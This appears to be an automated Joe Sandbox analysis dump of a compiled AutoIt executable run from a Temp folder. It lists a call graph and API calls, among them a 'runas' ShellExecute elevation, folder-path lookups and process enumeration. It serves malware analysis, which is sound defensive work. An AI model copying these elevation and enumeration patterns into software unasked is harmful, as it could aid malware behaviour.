87807->87804 87809 40f2c3 RegCloseKey 87808->87809 87810 40f298 87808->87810 87809->87804 87811 40f2a9 RegCloseKey 87810->87811 87812 425e1d 87810->87812 87811->87804 87813 42b1d2 87814 40bc10 53 API calls 87813->87814 87815 42b1e0 87814->87815 87822 4720db 87815->87822 87817 42b228 87909 45e737 90 API calls 3 library calls 87817->87909 87819 42bb6a 87910 44b92d VariantClear 87819->87910 87821 42bc5b 87823 472108 __cftof2_l 87822->87823 87824 4721d1 
87823->87824 87825 47215e 87823->87825 87827 47226d 87824->87827 87829 472545 SHGetFolderPathW 87824->87829 87830 472324 87824->87830 87831 4724a1 87824->87831 87832 4723ae 87824->87832 87833 4725ad SHGetFolderPathW 87824->87833 87834 47252b SHGetFolderPathW 87824->87834 87835 472369 87824->87835 87836 4724f7 SHGetFolderPathW 87824->87836 87837 472255 87824->87837 87838 472274 87824->87838 87839 4723f3 87824->87839 87840 472593 SHGetFolderPathW 87824->87840 87841 472511 SHGetFolderPathW 87824->87841 87842 4722df 87824->87842 87843 47255f SHGetFolderPathW 87824->87843 87844 47229e GetLocalTime 87824->87844 87845 47247d 87824->87845 87846 4724dd SHGetFolderPathW 87824->87846 87847 472579 SHGetFolderPathW 87824->87847 87848 472438 87824->87848 87826 401b10 52 API calls 87825->87826 87828 47216b 87826->87828 87827->87817 87911 40bd50 52 API calls 87828->87911 87851 4722be 87829->87851 87918 441e23 GetSystemTimeAsFileTime 87830->87918 87935 441e23 GetSystemTimeAsFileTime 87831->87935 87924 441e23 GetSystemTimeAsFileTime 87832->87924 87833->87851 87834->87851 87921 441e23 GetSystemTimeAsFileTime 87835->87921 87836->87851 87870 408f40 VariantClear 87837->87870 87913 408e80 VariantClear 87838->87913 87927 441e23 GetSystemTimeAsFileTime 87839->87927 87840->87851 87841->87851 87915 441e23 GetSystemTimeAsFileTime 87842->87915 87843->87851 87853 4722b9 87844->87853 87933 441e23 GetSystemTimeAsFileTime 87845->87933 87846->87851 87847->87851 87930 441e23 GetSystemTimeAsFileTime 87848->87930 87877 40e710 53 API calls 87851->87877 87914 41329b 79 API calls 3 library calls 87853->87914 87860 47233c 87919 451aa8 91 API calls _strftime 87860->87919 87861 47240b 87928 451aa8 91 API calls _strftime 87861->87928 87862 472381 87922 451aa8 91 API calls _strftime 87862->87922 87864 47217d 87875 40c2c0 52 API calls 87864->87875 87865 472450 87931 451aa8 91 API calls _strftime 87865->87931 87866 4722f7 87916 451aa8 91 API calls _strftime 87866->87916 87867 4723c6 87925 451aa8 91 API calls 
_strftime 87867->87925 87868 472489 87934 451b19 83 API calls 87868->87934 87869 4724b3 87936 451aa8 91 API calls _strftime 87869->87936 87870->87827 87887 47218c 87875->87887 87889 4722cc 87877->87889 87882 4724b9 87937 40e6a0 53 API calls 87882->87937 87883 472342 87920 40e6a0 53 API calls 87883->87920 87884 472411 87929 40e6a0 53 API calls 87884->87929 87885 47228b 87885->87817 87886 472387 87923 40e6a0 53 API calls 87886->87923 87908 472193 87887->87908 87912 408e80 VariantClear 87887->87912 87888 472456 87932 40e6a0 53 API calls 87888->87932 87889->87817 87890 4722fd 87917 40e6a0 53 API calls 87890->87917 87891 4723cc 87926 40e6a0 53 API calls 87891->87926 87899 4724c2 87899->87817 87900 47234b 87900->87817 87901 47241a 87901->87817 87902 472390 87902->87817 87903 47245f 87903->87817 87905 472306 87905->87817 87906 4723d5 87906->87817 87907 4721b6 87907->87817 87908->87817 87909->87819 87910->87821 87911->87864 87912->87907 87913->87885 87914->87851 87915->87866 87916->87890 87917->87905 87918->87860 87919->87883 87920->87900 87921->87862 87922->87886 87923->87902 87924->87867 87925->87891 87926->87906 87927->87861 87928->87884 87929->87901 87930->87865 87931->87888 87932->87903 87933->87868 87934->87853 87935->87869 87936->87882 87937->87899 87938 416454 87975 416c70 87938->87975 87940 416460 GetStartupInfoW 87941 416474 87940->87941 87976 419d5a HeapCreate 87941->87976 87943 4164cd 87944 4164d8 87943->87944 88060 41642b 46 API calls 3 library calls 87943->88060 87977 417c20 GetModuleHandleW 87944->87977 87947 4164de 87948 4164e9 __RTC_Initialize 87947->87948 88061 41642b 46 API calls 3 library calls 87947->88061 87996 41aaa1 GetStartupInfoW 87948->87996 87952 416503 GetCommandLineW 88009 41f584 GetEnvironmentStringsW 87952->88009 87955 416513 88015 41f4d6 GetModuleFileNameW 87955->88015 87958 41651d 87959 416528 87958->87959 88063 411924 46 API calls 3 library calls 87958->88063 88019 41f2a4 87959->88019 87962 41652e 87963 416539 87962->87963 88064 411924 46 
API calls 3 library calls 87962->88064 88033 411703 87963->88033 87966 416541 87968 41654c __wwincmdln 87966->87968 88065 411924 46 API calls 3 library calls 87966->88065 88037 40d6b0 87968->88037 87975->87940 87976->87943 87978 417c34 87977->87978 87979 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87977->87979 88068 4178ff 49 API calls _free 87978->88068 87981 417c87 TlsAlloc 87979->87981 87984 417cd5 TlsSetValue 87981->87984 87985 417d96 87981->87985 87982 417c39 87982->87947 87984->87985 87986 417ce6 __init_pointers 87984->87986 87985->87947 88069 418151 InitializeCriticalSectionAndSpinCount 87986->88069 87988 417d91 88077 4178ff 49 API calls _free 87988->88077 87990 417d2a 87990->87988 88070 416b49 87990->88070 87993 417d76 88076 41793c 46 API calls 4 library calls 87993->88076 87995 417d7e GetCurrentThreadId 87995->87985 87997 416b49 __calloc_crt 46 API calls 87996->87997 88008 41aabf 87997->88008 87998 41ac34 87999 41ac6a GetStdHandle 87998->87999 88001 41acce SetHandleCount 87998->88001 88002 41ac7c GetFileType 87998->88002 88007 41aca2 InitializeCriticalSectionAndSpinCount 87998->88007 87999->87998 88000 416b49 __calloc_crt 46 API calls 88000->88008 88003 4164f7 88001->88003 88002->87998 88003->87952 88062 411924 46 API calls 3 library calls 88003->88062 88004 41abb4 88004->87998 88005 41abe0 GetFileType 88004->88005 88006 41abeb InitializeCriticalSectionAndSpinCount 88004->88006 88005->88004 88005->88006 88006->88003 88006->88004 88007->87998 88007->88003 88008->87998 88008->88000 88008->88003 88008->88004 88008->88008 88010 41f595 88009->88010 88011 41f599 88009->88011 88010->87955 88087 416b04 88011->88087 88013 41f5bb _memmove 88014 41f5c2 FreeEnvironmentStringsW 88013->88014 88014->87955 88017 41f50b _wparse_cmdline 88015->88017 88016 41f54e _wparse_cmdline 88016->87958 88017->88016 88018 416b04 __malloc_crt 46 API calls 88017->88018 88018->88016 88020 41f2bc _wcslen 88019->88020 88024 41f2b4 88019->88024 88021 416b49 __calloc_crt 
46 API calls 88020->88021 88026 41f2e0 _wcslen 88021->88026 88022 41f336 88094 413748 88022->88094 88024->87962 88025 416b49 __calloc_crt 46 API calls 88025->88026 88026->88022 88026->88024 88026->88025 88027 41f35c 88026->88027 88030 41f373 88026->88030 88093 41ef12 46 API calls ___strgtold12_l 88026->88093 88028 413748 _free 46 API calls 88027->88028 88028->88024 88100 417ed3 88030->88100 88032 41f37f 88032->87962 88034 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88033->88034 88036 411750 __IsNonwritableInCurrentImage 88034->88036 88119 41130a 51 API calls __cinit 88034->88119 88036->87966 88038 42e2f3 88037->88038 88039 40d6cc 88037->88039 88040 408f40 VariantClear 88039->88040 88041 40d707 88040->88041 88120 40ebb0 88041->88120 88044 40d737 88123 411951 88044->88123 88049 40d751 88135 40f4e0 SystemParametersInfoW SystemParametersInfoW 88049->88135 88051 40d75f 88136 40d590 GetCurrentDirectoryW 88051->88136 88060->87944 88061->87948 88068->87982 88069->87990 88072 416b52 88070->88072 88073 416b8f 88072->88073 88074 416b70 Sleep 88072->88074 88078 41f677 88072->88078 88073->87988 88073->87993 88075 416b85 88074->88075 88075->88072 88075->88073 88076->87995 88077->87985 88079 41f683 88078->88079 88085 41f69e _malloc 88078->88085 88080 41f68f 88079->88080 88079->88085 88086 417f77 46 API calls __getptd_noexit 88080->88086 88082 41f6b1 HeapAlloc 88084 41f6d8 88082->88084 88082->88085 88083 41f694 88083->88072 88084->88072 88085->88082 88085->88084 88086->88083 88090 416b0d 88087->88090 88088 4135bb _malloc 45 API calls 88088->88090 88089 416b43 88089->88013 88090->88088 88090->88089 88091 416b24 Sleep 88090->88091 88092 416b39 88091->88092 88092->88089 88092->88090 88093->88026 88095 413753 RtlFreeHeap 88094->88095 88099 41377c _free 88094->88099 88096 413768 88095->88096 88095->88099 88103 417f77 46 API calls __getptd_noexit 88096->88103 88098 41376e GetLastError 88098->88099 88099->88024 88104 417daa 88100->88104 88103->88098 88105 
417dc9 __cftof2_l __call_reportfault 88104->88105 88106 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 88105->88106 88108 417eb5 __call_reportfault 88106->88108 88110 41a208 88108->88110 88109 417ed1 GetCurrentProcess TerminateProcess 88109->88032 88111 41a210 88110->88111 88112 41a212 IsDebuggerPresent 88110->88112 88111->88109 88118 41fe19 88112->88118 88115 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 88116 421ff0 __call_reportfault 88115->88116 88117 421ff8 GetCurrentProcess TerminateProcess 88115->88117 88116->88117 88117->88109 88118->88115 88119->88036 88176 40ebd0 88120->88176 88180 4182cb 88123->88180 88125 41195e 88187 4181f2 LeaveCriticalSection 88125->88187 88127 40d748 88128 4119b0 88127->88128 88129 4119d6 88128->88129 88130 4119bc 88128->88130 88129->88049 88130->88129 88222 417f77 46 API calls __getptd_noexit 88130->88222 88132 4119c6 88223 417f25 10 API calls ___strgtold12_l 88132->88223 88134 4119d1 88134->88049 88135->88051 88224 401f20 88136->88224 88175 40ec00 LoadLibraryA GetProcAddress 88175->88044 88177 40d72e 88176->88177 88178 40ebd6 LoadLibraryA 88176->88178 88177->88044 88177->88175 88178->88177 88179 40ebe7 GetProcAddress 88178->88179 88179->88177 88181 4182e0 88180->88181 88182 4182f3 EnterCriticalSection 88180->88182 88188 418209 88181->88188 88182->88125 88184 4182e6 88184->88182 88215 411924 46 API calls 3 library calls 88184->88215 88187->88127 88189 418215 type_info::_Type_info_dtor 88188->88189 88190 418225 88189->88190 88191 41823d 88189->88191 88216 418901 46 API calls __NMSG_WRITE 88190->88216 88194 416b04 __malloc_crt 45 API calls 88191->88194 88197 41824b type_info::_Type_info_dtor 88191->88197 88193 41822a 88217 418752 46 API calls 8 library calls 88193->88217 88196 418256 88194->88196 88199 41825d 88196->88199 88200 41826c 88196->88200 88197->88184 88198 418231 88218 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 88198->88218 88219 417f77 46 API calls 
__getptd_noexit 88199->88219 88202 4182cb __lock 45 API calls 88200->88202 88204 418273 88202->88204 88206 4182a6 88204->88206 88207 41827b InitializeCriticalSectionAndSpinCount 88204->88207 88210 413748 _free 45 API calls 88206->88210 88208 418297 88207->88208 88209 41828b 88207->88209 88221 4182c2 LeaveCriticalSection _doexit 88208->88221 88211 413748 _free 45 API calls 88209->88211 88210->88208 88216->88193 88217->88198 88219->88197 88221->88197 88222->88132 88223->88134 88334 40e6e0 88224->88334 89167 472c3f GetUserNameW 89168 40b2b9 89171 40ccd0 89168->89171 89170 40b2c4 89211 40cc70 89171->89211 89173 40ccf3 89174 42c3bb 89173->89174 89175 40cd1b 89173->89175 89187 40cd8a ctype 89173->89187 89231 45e737 90 API calls 3 library calls 89174->89231 89180 40cd30 89175->89180 89199 40cdad 89175->89199 89177 40cd72 89179 402780 52 API calls 89177->89179 89178 402780 52 API calls 89178->89180 89181 40cd80 89179->89181 89180->89177 89180->89178 89180->89187 89220 40e7d0 387 API calls 89181->89220 89182 40ce40 89221 40ceb0 53 API calls 89182->89221 89185 40ce53 89186 408f40 VariantClear 89185->89186 89188 40ce5b 89186->89188 89187->89170 89191 408f40 VariantClear 89188->89191 89189 42c3a0 89229 45e737 90 API calls 3 library calls 89189->89229 89190 42c31a 89222 45e737 90 API calls 3 library calls 89190->89222 89194 40ce63 89191->89194 89194->89170 89195 42c3ad 89230 452670 VariantClear 89195->89230 89196 40cc70 387 API calls 89196->89199 89197 42c327 89223 452670 VariantClear 89197->89223 89199->89182 89199->89189 89199->89190 89199->89196 89201 42c335 89199->89201 89202 42c370 89199->89202 89206 42c343 89199->89206 89224 452670 VariantClear 89201->89224 89227 45e737 90 API calls 3 library calls 89202->89227 89205 42c392 89228 452670 VariantClear 89205->89228 89225 45e737 90 API calls 3 library calls 89206->89225 89209 42c362 89226 452670 VariantClear 89209->89226 89212 40a780 387 API calls 89211->89212 89213 40cc96 89212->89213 89214 42bd0e 89213->89214 89215 40cc9e 
89213->89215 89216 408f40 VariantClear 89214->89216 89218 408f40 VariantClear 89215->89218 89217 42bd16 89216->89217 89217->89173 89219 40ccb8 89218->89219 89219->89173 89220->89187 89221->89185 89222->89197 89223->89187 89224->89187 89225->89209 89226->89187 89227->89205 89228->89187 89229->89195 89230->89187 89231->89187 89232 40b99a 89233 4115d7 52 API calls 89232->89233 89234 40b9a1 89233->89234 89235 425b5e 89240 40c7f0 89235->89240 89239 425b6d 89275 40db10 52 API calls 89240->89275 89242 40c82a 89276 410ab0 6 API calls 89242->89276 89244 40c86d 89245 40bc70 52 API calls 89244->89245 89246 40c877 89245->89246 89247 40bc70 52 API calls 89246->89247 89248 40c881 89247->89248 89249 40bc70 52 API calls 89248->89249 89250 40c88b 89249->89250 89251 40bc70 52 API calls 89250->89251 89252 40c8d1 89251->89252 89253 40bc70 52 API calls 89252->89253 89254 40c991 89253->89254 89277 40d2c0 52 API calls 89254->89277 89256 40c99b 89278 40d0d0 53 API calls 89256->89278 89258 40c9c1 89259 40bc70 52 API calls 89258->89259 89260 40c9cb 89259->89260 89279 40e310 53 API calls 89260->89279 89262 40ca28 89263 408f40 VariantClear 89262->89263 89264 40ca30 89263->89264 89265 408f40 VariantClear 89264->89265 89266 40ca38 GetStdHandle 89265->89266 89267 429630 89266->89267 89268 40ca87 89266->89268 89267->89268 89269 429639 89267->89269 89274 41130a 51 API calls __cinit 89268->89274 89280 4432c0 57 API calls 89269->89280 89271 429641 89281 44b6ab CreateThread 89271->89281 89273 42964f CloseHandle 89273->89268 89274->89239 89275->89242 89276->89244 89277->89256 89278->89258 89279->89262 89280->89271 89281->89273 89282 44b5cb 58 API calls 89281->89282
                                      APIs
                                      • _wcslen.LIBCMT ref: 004096C1
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0040970C
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                      • _memmove.LIBCMT ref: 00409D96
                                      • _memmove.LIBCMT ref: 0040A6C4
                                      • _memmove.LIBCMT ref: 004297E5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                      • String ID:
                                      • API String ID: 2383988440-0
                                      • Opcode ID: 3eb26635e6d2b96681982449c4f16249f7fd6930bd10e391eb5d64f23315697c
                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                      • Opcode Fuzzy Hash: 3eb26635e6d2b96681982449c4f16249f7fd6930bd10e391eb5d64f23315697c
                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                      • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                      • String ID: C:\Users\user\AppData\Local\Temp\AHPOBS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                      • API String ID: 2495805114-3892987466
                                      • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                      • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                      Control-flow Graph

                                      control_flow_graph 1699 4720db-472131 call 412f40 * 2 1704 47213b-472151 call 41313c 1699->1704 1707 472153-472157 1704->1707 1708 472159-47215c 1704->1708 1707->1704 1707->1708 1709 4721d1-4721d4 1708->1709 1710 47215e-472191 call 401b10 call 40bd50 call 40c2c0 1708->1710 1712 472db4-472dc4 call 402250 1709->1712 1713 4721da 1709->1713 1794 472193-4721ad call 402250 * 2 1710->1794 1795 4721b0-4721ce call 408e80 call 402250 * 2 1710->1795 1716 472545-47255a SHGetFolderPathW 1713->1716 1717 472324-472366 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1717 1718 4724a1-4724da call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1718 1719 4723ae-4723f0 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1719 1720 4725ad-4725c2 SHGetFolderPathW 1713->1720 1721 47252b-472540 SHGetFolderPathW 1713->1721 1722 472369-4723ab call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1722 1723 4724f7-47250c SHGetFolderPathW 1713->1723 1724 472255-472dad call 403cc0 call 408f40 1713->1724 1725 472274-47229b call 403cc0 call 408e80 call 402250 1713->1725 1726 4723f3-472435 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1726 1727 472593-4725a8 SHGetFolderPathW 1713->1727 1728 472511-472526 SHGetFolderPathW 1713->1728 1729 4722df-472321 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1729 1730 47255f-472574 SHGetFolderPathW 1713->1730 1731 47229e-4722b8 GetLocalTime 1713->1731 1732 47247d-47249c call 441e23 call 451b19 1713->1732 1733 4724dd-4724f2 SHGetFolderPathW 1713->1733 1734 472579-47258e SHGetFolderPathW 1713->1734 1735 472438-47247a call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1735 1740 4722c1-4722dc call 40e710 call 402250 1716->1740 1720->1740 1721->1740 1723->1740 1724->1712 1727->1740 1728->1740 1730->1740 1742 4722b9-4722be call 41329b 1731->1742 1732->1742 1733->1740 1734->1740 1742->1740
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                      • __swprintf.LIBCMT ref: 004722B9
                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                      Strings
                                      Memory Dump Source
                                       • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FolderPath$LocalTime__swprintf
                                      • String ID: %.3d
                                      • API String ID: 3337348382-986655627
                                      • Opcode ID: a58a57cd5ebc1ace6200ce5e5fba9a5da2eee674366265addf8639f2f8ddc892
                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                      • Opcode Fuzzy Hash: a58a57cd5ebc1ace6200ce5e5fba9a5da2eee674366265addf8639f2f8ddc892
                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64

                                      Control-flow Graph

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                      • GetNativeSystemInfo.KERNEL32(?), ref: 0040E632
                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                      Strings
                                      Memory Dump Source
                                       • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                      • String ID: 0SH
                                      • API String ID: 3363477735-851180471
                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                      • __wsplitpath.LIBCMT ref: 00433F63
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00433F76
                                      • __wcsicoll.LIBCMT ref: 00433F86
                                      • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
